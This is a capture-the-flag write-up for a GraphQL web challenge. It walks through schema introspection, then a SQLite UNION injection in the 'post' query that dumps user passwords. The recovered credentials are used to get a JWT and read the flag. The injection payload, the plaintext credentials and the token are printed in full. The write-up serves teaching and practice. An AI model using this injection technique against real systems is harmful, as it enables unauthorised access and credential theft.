Tags: sqlite web graphql 

Rating: 4.0

After we started searching, we found GraphQL on /graphql.
With big payload from PayloadsAllTheThings we can get all the information out of it.

For convenience, we can use "GraphQL Voyager" extension in Burpsuite.


{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null}

The information we received from the response we can put to https://apis.guru/graphql-voyager/ and get an easy-to-view graph.
In this graph we see that we have "flag" query.
Let's try to send a request:
query {
But we get in response:
"message":"error authenticating user: invalid token"

After spending a lot of time on Google and looking for information about GraphQL, and sending a large number of requests, we found SQLite injection on post query:
query UserQuery{
post (name:"' union select 1,2,3,password,5,6 from users --") {
From the posts on the site we found name of the author - congon4tor.

Now we have credentials congon4tor:n8bboB!3%vDwiASVgKhv

Need to get token with this credentials.

With the help of my teammate jelly7183

query {
__schema {
types {
name,fields {
name, args {
name,description,type {
name, kind, ofType {
name, kind

Now need to send request with mutation to authenticateUser.

mutation {
authenticateUser(username:"congon4tor", password:"n8bboB!3%vDwiASVgKhv"){token}
Great, now we have a token, it remains to form a normal request to "flag" query.
Add this header to HTTP request:
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImNvbmdvbjR0b3IiLCJleHAiOjE2MzIxNjE1NzIsImlhdCI6MTYzMTk4ODc3MiwiaXNzIjoiQ29uZ29uNHRvciJ9.Gqllh1rt_OHVcTWMfRREZy0pKPRxhlsvxQFw6Wu0rxE
and set
query {
and we have flag in response:

Sadman_Abrar_RafinSept. 19, 2021, 2:33 a.m.

very nice!!!! ???